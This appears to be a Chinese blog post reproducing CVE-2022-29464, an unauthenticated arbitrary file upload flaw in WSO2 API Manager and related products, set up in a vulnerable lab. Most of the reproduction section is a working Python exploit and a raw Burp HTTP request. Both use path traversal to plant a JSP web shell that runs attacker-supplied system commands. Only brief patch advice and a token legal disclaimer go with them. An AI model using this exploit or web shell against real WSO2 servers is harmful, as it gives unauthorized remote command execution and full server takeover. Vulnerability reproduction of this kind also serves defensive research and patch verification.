CVE-2022-29464 WSO2 任意文件上传漏洞复现
目录
0x01 声明:
0x02 简介:
0x03 漏洞概述:
0x04 影响版本:
0x05 环境搭建:
vulfocus搭建:
0x06 漏洞复现:
1、EXP利用:
2、Burp改包:
0x07 流量分析:
0x08 修复建议:
0x01 声明:
仅供学习参考使用,请勿用作违法用途,否则后果自负。
0x02 简介:
WSO2 是一个领先的开源 SOA 解决方案,包含了 SOA 相关的各种基础设施、技术框架和相关工具、流程 server、appserver 等。
0x03 漏洞概述:
近日,WSO2 官网发布关于 WSO2 API Manager 中存在任意文件上传和远程代码执行漏洞的信息。该漏洞是由于 WSO2 存在路由对输入的内容过滤不严格,攻击者可以利用该漏洞在未授权的情况下,构造恶意数据执行文件上传攻击,最终获取服务器最高权限。
0x04 影响版本:
2.2.0 ≤ WSO2 API Manager ≤ 4.0.0
5.2.0 ≤ WSO2 Identity Server ≤ 5.11.0
WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, 5.6.0
5.3.0 ≤ WSO2 Identity Server as Key Manager ≤ 5.10.0
6.2.0 ≤ WSO2 Enterprise Integrator ≤ 6.6.0
0x05 环境搭建:
vulfocus搭建:
((Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客)
浏览器访问:
0x06 漏洞复现:
1、EXP利用:
import requests
import urllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)url = input("请输入URL:")
file = "shell.jsp"
payload = """<FORM><INPUT name='cmd' type=text><INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %><%String cmd = request.getParameter("cmd");String output = "";if(cmd != null) {String s = null;try {Process p = Runtime.getRuntime().exec(cmd,null,null);BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));while((s = sI.readLine()) != null) { output += s+"</br>"; }} catch(IOException e) { e.printStackTrace(); }}
%><pre><%=output %></pre>"""files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": payload}
response = requests.post(f'{url}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {url}/authenticationendpoint/{file}")
2、Burp改包:
POST /fileupload/toolsAny HTTP/1.1
Host: x.x.x.x:port
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"<FORM><INPUT name='cmd' type=text><INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %><%String cmd = request.getParameter("cmd");String output = "";if(cmd != null) {String s = null;try {Process p = Runtime.getRuntime().exec(cmd,null,null);BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));while((s = sI.readLine()) != null) { output += s+"</br>"; }} catch(IOException e) { e.printStackTrace(); }}
%><pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--
请求:https://192.168.119.155:56079/authenticationendpoint/1.jsp
0x07 流量分析:
由于是TLS加密数据包所以就做一下EXP的分析吧。
0x08 修复建议:
厂商已分别发布补丁修复漏洞,用户请尽快更新至安全版本。
官方下载地址: https://github.com/wso2/product-apim/releases
CVE-2022-29464 WSO2 任意文件上传漏洞复现相关推荐
- UEditor .Net版本任意文件上传漏洞复现总结
UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近 ...
- 畅捷通T+ v17任意文件上传漏洞复现
1.前言 8月29晚上就开始收到通知,让我们来排查一下是否有使用畅捷通的系统,说是疑似0day导致很多用户被植入勒索病毒,一时间风头十足.第二天很多平台都更新的防护策略,本次漏洞是任意文件上传漏洞,如 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用
1.漏洞概述 用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件.用友 GRP-U8 U8AppProx ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
- UEditor .Net版本任意文件上传漏洞复现
目录 漏洞背景 漏洞影响 漏洞利用 漏洞分析 防御措施 漏洞背景 UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器 漏洞影响 该漏洞影响UEditor的.N ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...
- php上传漏洞绕过gd库,jQuery File Upload任意文件上传漏洞
事件背景 jQuery是一个快速.简洁的JavaScript框架,是继Prototype之后又一个JavaScript代码库(或JavaScript框架).jQuery File Upload一个jQ ...
- 详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)
聚焦源代码安全,网罗国内外最新资讯! 概述 Sonlogger 是土耳其SFC 公司 开发的一款应用软件,兼容土耳其<第5651号法>,是一款基于 Web 的 SonicWall 防火墙 ...
最新文章
- JS简单实现自定义右键菜单
- sourcetree下回退
- Karpathy更新深度学习开源框架排名:TensorFlow第一,PyTorch第二
- em算法的java实现_EM算法 - Java教程 - 找一找教程网
- lvs之 lvs原理架构介绍
- java面向对象程序课本,Java面向对象程序设计
- OpenShift Security (1) - 红帽多集群安全管理 RHACS 的主要功能和技术架构
- wpf esc key 检测不到_爬虫笔记之requests检测网站编码方式(zozo.jp)(碎碎念) - CC11001100...
- [中等]寻找缺失的数
- puppet详解(四)——package资源详解
- wireshark过滤指定ip的数据包
- 深度Q学习——从入门到实践
- Lattice Diamond 3.12下载与安装(免费获取license.dat)
- 自己动手做Arduino玩具(二)
- Visual Studio 2013下载及其安装
- #UML# Astah+Doxygen 将C++源码映射为类图
- dhcp authoritative参数作用
- C/C++ Linux 键盘检测
- sql查询结果加上序号
- 极限和连续+偏导+方向导数+可微+梯度+链式法则+hessian矩阵